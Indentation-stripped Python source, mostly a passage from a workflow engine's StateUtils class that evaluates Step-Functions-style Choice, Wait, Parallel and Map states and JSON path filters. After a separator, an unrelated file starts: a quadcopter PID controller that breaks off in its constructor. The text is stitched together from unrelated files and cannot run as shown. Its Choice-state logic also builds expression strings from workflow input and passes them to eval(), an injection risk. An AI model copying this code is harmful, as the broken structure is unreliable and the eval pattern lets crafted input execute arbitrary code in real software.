#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentMapInfo:" + json.dumps(parentMapInfo))
#self._logger.debug("\t mapName:" + mapName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
if mapInfoKey in metadata:
mapInfo = metadata[mapInfoKey]
rest = metadata["__function_execution_id"].split("_")[1:]
for codes in rest: # find marker for map state and use it to calculate curent index
if "-M" in codes:
index = rest.index(codes)
current_index = int(rest[index].split("-M")[0])
self._logger.debug("[StateUtils] current_index: " + str(current_index))
if mapInfo["MaxConcurrency"] != 0:
current_index = current_index % int(mapInfo["MaxConcurrency"])
counterName = str(mapInfo["CounterName"])
branchOutputKeys = mapInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[current_index])
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
self._logger.debug("\t branchOutputKey:" + branchOutputKey)
self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find MapInfo")
raise Exception("processBranchTerminalState Unable to find MapInfo")
def evaluatePostParallel(self, function_input, key, metadata, sapi):
action = metadata["__state_action"]
assert action == "post_parallel_processing"
counterValue = function_input["CounterValue"]
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
full_metadata = json.loads(full_metadata_encoded)
parallelInfoKey = self.functionstatename + "_" + key + "_parallel_info"
parallelInfo = full_metadata[parallelInfoKey]
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
klist = parallelInfo["Klist"]
NumBranchesFinished = abs(counterValue)
do_cleanup = False
if klist[-1] == NumBranchesFinished:
do_cleanup = True
counterName = str(parallelInfo["CounterName"])
assert py3utils.is_string(counterName)
counter_metadata_key_name = counterName + "_metadata"
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
sapi.delete(workflow_instance_metadata_storage_key)
post_parallel_output_values = []
for outputkey in parallelInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet:
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
post_parallel_output_values = post_parallel_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
else:
post_parallel_output_values = post_parallel_output_values + [None]
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if "Next" in self.parsedfunctionstateinfo:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], post_parallel_output_values)
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", post_parallel_output_values)
return function_input, full_metadata
def evaluateNonTaskState(self, function_input, key, metadata, sapi):
# 3. Evaluate Non Task states
#self._logger.debug("[StateUtils] NonTask state type: " + str(self.functionstatetype))
#self._logger.debug("[StateUtils] Welcome to evaluateNonTaskState! Current key:" + str(key))
function_output = None
if self.functionstatetype == StateUtils.choiceStateType:
#self._logger.debug("[StateUtils] Choice state info:" + str(self.functionstateinfo))
self.evaluateChoiceConditions(function_input) # this sets chosen Next state
#self._logger.debug("[StateUtils] Choice state Next:" + str(self.choiceNext))
function_output = function_input # output of the Choice state
elif self.functionstatetype == StateUtils.waitStateType:
#self._logger.debug("[StateUtils] Wait state info:" + str(self.functionstateinfo))
function_output = function_input
if "Seconds" in list(json.loads(self.functionstateinfo).keys()):
wait_state_seconds = json.loads(self.functionstateinfo)['Seconds']
#self._logger.debug("[StateUtils] Wait state seconds:" + str(wait_state_seconds))
time.sleep(float(wait_state_seconds))
elif "SecondsPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_secondspath = json.loads(self.functionstateinfo)['SecondsPath']
#self._logger.debug("[StateUtils] Wait state secondspath:" + str(wait_state_secondspath))
wait_state_secondspath_data = [match.value for match in parse(wait_state_secondspath).find(function_input)]
if wait_state_secondspath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamppath does not match: " + str(wait_state_secondspath))
raise Exception("Wait state timestamppath does not match")
#self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_secondspath_data[0]))
time.sleep(float(wait_state_secondspath_data[0]))
elif "Timestamp" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamp = json.loads(self.functionstateinfo)['Timestamp']
#self._logger.debug("[StateUtils] Wait state timestamp:" + str(wait_state_timestamp))
target_time = datetime.strptime(str(wait_state_timestamp), "%Y-%m-%dT%H:%M:%SZ")
current_time = datetime.utcnow()
#self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
#self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamp))
elif "TimestampPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamppath = json.loads(self.functionstateinfo)['TimestampPath']
self._logger.debug("[StateUtils] Wait state timestamppath:" + str(wait_state_timestamppath))
# need to communicate with datalayer for definition of trigger for hibernating/resuming task
wait_state_timestamppath_data = [match.value for match in parse(wait_state_timestamppath).find(function_input)]
if wait_state_timestamppath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamp_path does not match: " + str(wait_state_timestamppath))
raise Exception("Wait state timestamp_path does not match")
self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_timestamppath_data[0]))
target_time = datetime.strptime(str(wait_state_timestamppath_data[0]), "%Y-%m-%dT%H:%M:%SZ")
self._logger.debug("[StateUtils] Wait state timestamp data" + str(target_time))
current_time = datetime.utcnow()
self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining_time))
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
raise Exception("Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
else:
raise Exception("Wait state: Missing required field")
elif self.functionstatetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state handling, received value:" + str(function_input))
function_output = function_input
if "Result" in self.functionstateinfo:
pass_state_result = json.loads(self.functionstateinfo)['Result']
self._logger.debug("[StateUtils] Pass state result:" + str(pass_state_result))# self.functionstateinfo['Result']))
function_output = pass_state_result
elif self.functionstatetype == StateUtils.succeedStateType:
function_output = function_input
elif self.functionstatetype == StateUtils.failStateType:
self._logger.debug("[StateUtils] Fail state handling, received value:" + str(function_input))
self._logger.debug("[StateUtils] Fail state handling, received metadata:" + str(metadata))
if "Cause" in self.functionstateinfo:
fail_state_cause = json.loads(self.functionstateinfo)['Cause']
self._logger.debug("[StateUtils] Fail state cause info:" + str(fail_state_cause))
if "Error" in self.functionstateinfo:
error_state_error = json.loads(self.functionstateinfo)['Error']
self._logger.debug("[StateUtils] Fail state error info:" + str(error_state_error))
function_output = function_input
elif self.functionstatetype == StateUtils.parallelStateType:
self._logger.debug("[StateUtils] Parallel state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Parallel state handling metadata: " + str(metadata))
self._logger.debug("[StateUtils] Parallel state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_parallel_processing":
function_output, metadata = self.evaluateParallelState(function_input, key, metadata, sapi)
else:
if metadata["__state_action"] == "post_parallel_processing":
function_output, metadata = self.evaluatePostParallel(function_input, key, metadata, sapi)
elif self.functionstatetype == StateUtils.mapStateType:
name_prefix = self.functiontopic + "_" + key
self._logger.debug("[StateUtils] Map state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Map state handling metadata: " + str(metadata))
if "MaxConcurrency" in self.parsedfunctionstateinfo.keys():
maxConcurrency = int(self.parsedfunctionstateinfo["MaxConcurrency"])
else:
maxConcurrency = 0
self._logger.debug("[StateUtils] Map state maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] Map state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_map_processing":
# here we start the iteration process on a first batch
if maxConcurrency != 0:
tobeProcessednow = function_input[:maxConcurrency] # take the first maxConcurrency elements
tobeProcessedlater = function_input[maxConcurrency:] # keep the remaining elements for later
else:
tobeProcessednow = function_input
tobeProcessedlater = []
self._logger.debug("[StateUtils] Map state function_input split:" + str(tobeProcessednow) + " " + str(tobeProcessedlater))
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater)) # store elements to be processed on DL
sapi.put(name_prefix + "_" + "mapStatePartialResult", "[]") # initialise the collector variable
sapi.put(name_prefix + "_" + "mapInputCount", str(len(function_input)))
function_output, metadata = self.evaluateMapState(tobeProcessednow, key, metadata, sapi)
elif metadata["__state_action"] == "post_map_processing":
tobeProcessedlater = ast.literal_eval(sapi.get(name_prefix + "_" + "tobeProcessedlater")) # get all elements that have not yet been processed
self._logger.debug("[StateUtils] Map state post_map processing input:" + str(tobeProcessedlater))
# we need to decide at this point if there is a need for more batches. if so:
if len(tobeProcessedlater) > 0: # we need to start another batch
function_output, metadata2 = self.evaluatePostMap(function_input, key, metadata, sapi) # take care not to overwrite metadata
function_output, metadata = self.evaluateMapState(tobeProcessedlater[:maxConcurrency], key, metadata, sapi) # start a new batch
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater[maxConcurrency:])) # store remaining elements to be processed on DL
else:# no more batches required. we are at the iteration end, publish the final result
self._logger.debug("[StateUtils] Map state input final stage: " + str(function_input))
function_output, metadata = self.evaluatePostMap(function_input, key, metadata, sapi)
else:
raise Exception("Unknow action type in map state")
else:
raise Exception("Unknown state type")
return function_output, metadata
def applyResultPath(self, raw_state_input, function_output):
#4. Apply ResultPath, if available and if not 'Parallel' state
# if ResultPath:
# if ResultPath == '$' (this is the default value)
# raw_state_input_midway = function_output
# if ResultPath == 'null'
# raw_state_input_midway = raw_state_input
# if ResultPath == some variable name
# raw_state_input[some variable name] = function_output
# raw_state_input_midway = raw_state_input
# else:
# raw_state_input_midway = function_output
#
raw_state_input_midway = raw_state_input
#self._logger.debug("Reached applyResultPath: " + str(self.result_path_dict))
try:
if self.result_path_dict and 'ResultPath' in self.result_path_dict:
raw_state_input_midway = self.process_result_path(self.result_path_dict, raw_state_input, function_output)
else:
raw_state_input_midway = function_output
return raw_state_input_midway
except Exception as exc:
raise Exception("Result path processing exception: " + str(exc))
#self._logger.exception("Result path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def applyOutputPath(self, raw_state_input_midway):
#5. Apply OutputPath, if available
# if OutputPath:
# if OutputPath == '$' (this is the default value)
# raw_state_output = raw_state_input_midway
# if OutputPath = 'null'
# raw_state_output = {}
# if OutputPath == some existing variable in 'raw_state_input_midway'
# raw_state_output = raw_state_input_midway[some existing variable]
# if OutputPath == some non-existing variable
# throw exception
# else:
# raw_state_output = raw_state_input_midway
raw_state_output = raw_state_input_midway
try:
if self.output_path_dict and 'OutputPath' in self.output_path_dict:
raw_state_output = self.process_output_path(self.output_path_dict, raw_state_input_midway)
else:
raw_state_output = raw_state_input_midway
return raw_state_output
except Exception as exc:
raise Exception("Output path processing exception: " + str(exc))
#self._logger.exception("Output path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def parse_function_state_info(self):
if self.functionstatetype == StateUtils.defaultStateType:
#self._logger.debug("Task_SAND state parsing. Not parsing further")
return
else:
self.parsedfunctionstateinfo = json.loads(self.functionstateinfo)
statedef = self.parsedfunctionstateinfo
statetype = self.functionstatetype
assert statetype == statedef['Type']
if statetype == StateUtils.waitStateType:
self._logger.debug("Wait state parsing")
if statetype == StateUtils.failStateType:
self._logger.debug("Fail state parsing")
if statetype == StateUtils.succeedStateType:
self._logger.debug("Succeed state parsing")
if statetype == StateUtils.taskStateType:
#self._logger.debug("Task state parsing")
if "InputPath" in statedef: # read the I/O Path dicts
self.input_path_dict['InputPath'] = statedef['InputPath']
#self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
#self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if "Catch" in statedef:
self.catcher_list = statedef['Catch']
# parse it once and store it
self.catcher_list = ast.literal_eval(str(self.catcher_list))
#self._logger.debug("found Catchers: " + str(self.catcher_list))
if "Retry" in statedef:
self.retry_list = statedef['Retry']
# parse it once and store it
self.retry_list = ast.literal_eval(str(self.retry_list))
#self._logger.debug("found Retry: " + str(self.retry_list))
if statetype == StateUtils.choiceStateType:
#self._logger.debug("Choice state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(statedef['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(statedef['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
self._logger.debug("Choice state rules: " + json.dumps(statedef))
if "Default" in statedef:
self.default_next_choice.append(statedef["Default"])
self._logger.debug("DefaultTarget: " + str(self.default_next_choice))
choices_list = statedef['Choices'] # get the choice rule list for this state
self._logger.debug("Choice state rules list: " + str(choices_list))
key_dict = {} # parse the choice rule list into an expression tree
for choices in choices_list:
self._logger.debug("Choice state rule element processed: " + json.dumps(list(choices.keys())))
#self._logger.debug("converted_function_output: " + str(converted_function_output))
operator_counter = 0
if ("Not" in list(choices.keys())) or ("And" in list(choices.keys())) or ("Or" in list(choices.keys())):
operator_counter += 1
if operator_counter == 0: # No operators, so no recursive evaluation required
self.traverse(choices['Next'], choices)
hostname = self.nodelist[-1].split("/")[0]
childname = self.nodelist[-1].split("/")[1]
previousnode = anytree.Node(choices['Next'])
root = previousnode
key_dict[hostname] = previousnode
previousnode = anytree.Node(childname, parent=previousnode) # key_dict[hostname])
#evalname = ast.literal_eval(str(previousnode.name))
else: # operator detected, we need to traverse the choice rule tree
self.traverse(choices['Next'], choices)
nodename = self.nodelist[-1].split("/")[0]
previousnode = anytree.Node(nodename)
root = previousnode
key_dict[self.nodelist[-1].split("/{")[0]] = previousnode
no_childs = 1 # we already have attached the root
for i in range(len(self.nodelist)): # count the nodes in the choice rule tree which do not have childs
children = self.nodelist[-(i+1)].split("/")[-1]
if children.strip("") == "{}":
no_childs += 1
for i in range(no_childs):
nodename = self.nodelist[-(i+2)].split("/")[i+1]
previousnode = anytree.Node(nodename, parent=previousnode)
key_dict[self.nodelist[-(i+2)].split("/{")[0]] = previousnode
# from now on we have to attach the children expressions
for i in range(len(self.nodelist)-no_childs):
childname = self.nodelist[-(i+no_childs+1)].split("/")[-1]
hostname = self.nodelist[-(i+no_childs+1)].split("/{")[0]
previousnode = anytree.Node(childname, key_dict[hostname])
#self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(root)))
self.parsed_trees.append(root)
if statetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.parallelStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.mapStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "ItemsPath" in statedef:
self.items_path_dict['ItemsPath'] = statedef['ItemsPath']
self._logger.debug("found ItemsPath: " + json.dumps(self.items_path_dict['ItemsPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
def EvaluateNode(self, node):
"""
Recursively parse the expression tree starting from given node into a python statement
"""
if not node.children: # this is a leaf node
evalname = json.dumps(ast.literal_eval(str(node.name)))
#type(evalname) == int or type(evalname) == float:
ev_expr = "(" + self.evaluate(evalname) + ")"
return ev_expr
else: #node is an operator
if node.name == "Not": # there can be only one child
child = node.children[0]
evalname = json.dumps(ast.literal_eval(str(child.name)))
ev_expr = self.evaluate(evalname)
return "not (%s)" % ev_expr
if node.name == "And": # collect all children recursively
child_and_array = []
for child in node.children:
child_and_array.append(self.EvaluateNode(child))
returnstr = "(" + " and ".join(child_and_array) + ")"
return returnstr
if node.name == "Or": # collect all children recursively
child_or_array = []
for child in node.children:
child_or_array.append(self.EvaluateNode(child))
returnstr = "(" + " or ".join(child_or_array) + ")"
return returnstr
else: #unknown operator found here. Thow some error!
raise Exception("Parse Error: unknown operator found: ", node.name)
def evaluate(self, expression):
"""
evaluate a AWS Choice rule expression with the data contained in values
"""
expr = []
ex = json.loads(expression)
self._logger.debug(expression)
vals = {}
if "Variable" in ex.keys():
k = ex["Variable"].split("$.")[1]
vals[k] = ""
expr.append(k)
for op in self.operators:
if op in ex.keys():
expr.append(self.operators_python[self.operators.index(op)])
expr.append(ex[op])
break
if isinstance(expr[2], (int, float)):
result = "%s %s %s" % (expr[0], expr[1], expr[2])
else:
result = "%s %s '%s'" % (expr[0], expr[1], expr[2]) # we want to compare strings with strings
return result
def process_parameters(self, parameters, state_data):
"""
evaluate JSON path Paramaters in conjunction with state_data
"""
parameters = parameters['Parameters']
ret_value = None
ret_item_value = None
if parameters == "$": # return unfiltered input data
ret_value = state_data
elif parameters is None: #return empty json
ret_value = {}
else: # contains a parameter filter, get it and return selected kv pairs
ret_value = {}
ret_index = {}
for key in parameters.keys(): # process parameters keys
if key.casefold() == "comment".casefold(): # ignore
ret_value[key] = parameters[key]
elif parameters[key] == "$$.Map.Item.Value": # get Items key
value_key = key.split(".$")[0]
ret_value = value_key
ret_item_value = value_key
elif parameters[key] == "$$.Map.Item.Index": # get Index key
index_key = key.split(".$")[0]
ret_index = index_key
else: # processing more complex Parameters values
if isinstance(parameters[key], dict): # parameters key refers to dict value
ret_value[key] = {}
for k in parameters[key]: # get nested keys
if not k.split(".")[-1] == "$": # parse static value
print (parameters[key][k])
ret_value[key][k] = parameters[key][k]
else:
new_key = k.split(".$")[0] # use the json paths in paramters to match
ret_value[key][new_key] = [match.value for match in parse(parameters[key][k]).find(state_data)][0]
return ret_value
if isinstance(parameters[key], str): # parameters key refers to string value
ret_value = {}
new_key = key.split(".$")[0] # get the parameters key
query_key = parameters[key].split("$.")[1] # correct the correspondig value
new_value = state_data[query_key] # save the actual value before replacing the key
for kk in state_data.keys():
if isinstance(state_data[kk], dict): # value encapsulates dict
ret_value[new_key] = new_value
if ret_item_value != None:
ret_value[ret_item_value] = state_data[kk]
else:
raise Exception("Error: item value is not set!")
ret_value_dict = {}
ret_value_dict[kk] = ret_value
return ret_value_dict
if isinstance(state_data[kk], list): # value encapsulates list
ret_value_list = []
for data in state_data[kk]:
ret_value_list.append({new_key: new_value, ret_item_value: data})
ret_value_dict = {}
ret_value_dict[kk] = ret_value_list
return ret_value_dict
else:
raise Exception("Error: invaldid Parmeters format: " + str(parameters[key]))
# calculate transformed state output provided to Iterator
ret_total = []
ret_total_dict = {}
if isinstance(state_data, dict):
for kk in state_data.keys():
for key in state_data[kk]:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data[kk].index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data[kk].index(key) })
else:
raise Exception("Map State Parameters parse error on dict input: " + str(state_data))
ret_total_dict[kk] = ret_total
ret_value = ret_total_dict
elif isinstance(state_data, list):
for key in state_data:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data.index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data.index(key) })
else:
raise Exception("Map State Parameters parse error on list input: " + str(list))
ret_value = ret_total
else:
raise Exception("Map state parse error: invalid state input")
return ret_value
def process_items_path(self, path_fields, state_data):
ret_value = None
if 'ItemsPath' not in list(path_fields.keys()):
path_fields['ItemsPath'] = "$"
input_path = path_fields['ItemsPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty list
ret_value = []
else: # it contains a filter, get it and return selected list in input
self._logger.debug("seeing items_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
if not filtered_state_data:
raise Exception("Items Path processing exception: no match with map state item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def process_input_path(self, path_fields, state_data):
ret_value = None
if 'InputPath' not in list(path_fields.keys()):
path_fields['InputPath'] = "$"
#return state_data
input_path = path_fields['InputPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty dict
ret_value = {}
else: # input_path contains a filter, get and apply it
self._logger.debug("seeing input_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
self._logger.debug("after seeing input_path filter: " + str(filtered_state_data))
if not filtered_state_data:
raise Exception("Input Path processing exception: no match with state input item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def nested_dict(self, keys, value):
if len(keys) == 1:
return {keys[0]: value}
return {keys[0]: self.nested_dict(keys[1:], value)}
def process_result_path(self, path_fields, state_data, task_output):
ret_value = None
# path_fields: result path dict
# state_data: input dict
# task_output: output of the state/task
if 'ResultPath' not in list(path_fields.keys()):
path_fields['ResultPath'] = "$"
result_path = path_fields['ResultPath']
if result_path == "$":
ret_value = state_data
elif result_path is None:
ret_value = {}
else: # result_path is not empty so is there a match?
self._logger.debug("inside ResultPath processing: " + str(result_path) + " " + str(task_output) )
keys = list(tokenize(result_path)) # get all keys
filtered_state_data = self.nested_dict(keys[1:], task_output)
if isinstance(state_data, dict):
ret_value = dict(list(filtered_state_data.items()) + list(state_data.items())) # adding key and values to new dict
else:
ret_value = filtered_state_data
return ret_value
def process_output_path(self, path_fields, raw_state_input_midway):
ret_value = None
if 'OutputPath' not in list(path_fields.keys()):
path_fields['OutputPath'] = "$"
output_path = path_fields['OutputPath']
if output_path == "$":
ret_value = raw_state_input_midway
elif output_path is None:
ret_value = {}
else: # output_path is not empty so is there a match?
filtered_state_data = [match.value for match in parse(output_path).find(raw_state_input_midway)]
if not filtered_state_data:
raise Exception("Exception: no match with state input item, invalid path!")
else:
key = str(parse(output_path).nodes[-1].value[0])
filtered_state_data = raw_state_input_midway[key]
ret_value = filtered_state_data
return ret_value
def traverse(self, path, obj):
"""
Traverse the object recursively and print every path / value pairs.
"""
cnt = -1
if isinstance(obj, dict):
d = obj
d_sum = {}
for k, v in list(d.items()):
if isinstance(v, dict):
self.traverse(path + "/" + k, v)
elif isinstance(v, list):
self.traverse(path + "/" + k, v)
else:
d_sum[k] = v
self.nodelist.append(path + "/" + str(d_sum))
if isinstance(obj, list):
li = obj
for e in li:
cnt += 1
if isinstance(e, dict):
self.traverse("{path}".format(path=path), e)
elif isinstance(e, list):
self.traverse("{path}".format(path=path), e)
def evaluateNextState(self, function_input):
# this should be called for Choice state only
# for the rest the next values are statically defined and are parsed by hostagent
if len(self.default_next_choice) > 0:
nextfunc = self.default_next_choice[-1]
self._logger.debug("[StateUtils] choice_function_input: " + str(function_input))
for tree in self.parsed_trees:
##self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(tree.root)))
##self._logger.debug("Resulting Rendered Tree Root: " + str(tree.root))
test = self.EvaluateNode(tree.children[0])
self._logger.debug("[StateUtils] choice test: " + str(test))
self._logger.debug("Resulting Parsed Expression: " + str(test))
self._logger.debug("Current Value String: " + json.dumps(function_input))
# Sample value input to choice {"Comment": "Test my Iterator function", "iterator": {"count": 10, "index": 5, "step": 1}}
for key in list(function_input.keys()):
new_test = "False"
key = str(key)
if key == "Comment":
continue
#if "iterator.continue" == str(key):
self._logger.debug("[StateUtils] choice value key under test: " + key)
#keys = "continue"
if key in str(test):
val = function_input[key]
self._logger.debug("[StateUtils] choice val: " + str(val))
if isinstance(val, (int, float)): # calculate new_test value, no additional processing of values
self._logger.debug("[StateUtils] choice key/val: " + key + "/" + str(val))
new_test = test.replace(key, str(val))
self._logger.debug("[StateUtils] choice eval new_test: " + str(eval(str(new_test))))
elif "." in test: # need to process the json path of this variable name
test2 = "$." + test.lstrip('(').rstrip(')').split("==")[0] # rebuild the json path for the variable
jsonpath_expr = parse(test2)
choice_state_path_data = [match.value for match in jsonpath_expr.find(function_input)]
new_test = str(choice_state_path_data[0])
else:
new_test = test.replace(key, "'" + str(val)+"'") # need to add high colons to key to mark as string inside the expression
if eval(str(new_test)):
nextfunc = tree.root.name.strip("/")
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc # {"next":nextfunc, "value": post_processed_value}
# if no choice rule applied, return the last one (assigned at the beginning)
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc
|
controller.py
|
import numpy as np
import math
import time
import threading
class Controller_PID_Point2Point():
def __init__(self, get_state, get_time, actuate_motors, params, quad_identifier):
self.quad_identifier = quad_identifier
self.actuate_motors = actuate_motors
self.get_state = get_state
self.get_time = get_time
self.MOTOR_LIMITS = params['Motor_limits']
self.TILT_LIMITS = [(params['Tilt_limits'][0]/180.0)*3.14,(params['Tilt_limits'][1]/180.0)*3.14]
self.YAW_CONTROL_LIMITS = params['Yaw_Control_Limits']
self.Z_LIMITS = [self.MOTOR_LIMITS[0]+params['Z_XY_offset'],self.MOTOR_LIMITS[1]-params['Z_XY_offset']]
self.LINEAR_P = params['Linear_PID']['P']
self.LINEAR_I = params['Linear_PID']['I']
self.LINEAR_D = params['Linear_PID']['D']
self.LINEAR_TO_ANGULAR_SCALER = params['Linear_To_Angular_Scaler']
self.YAW_RATE_SCALER = params['Yaw_Rate_Scaler']
self.ANGULAR_P = params['Angular_PID']['P']
self.ANGULAR_I = params['Angular_PID']['I']
self.ANGULAR_D = params['Angular_PID']['D']
self.xi_term = 0
self.yi_term = 0
self.zi_term = 0
self.thetai_term = 0
self.phii_term = 0
self.gammai_term = 0
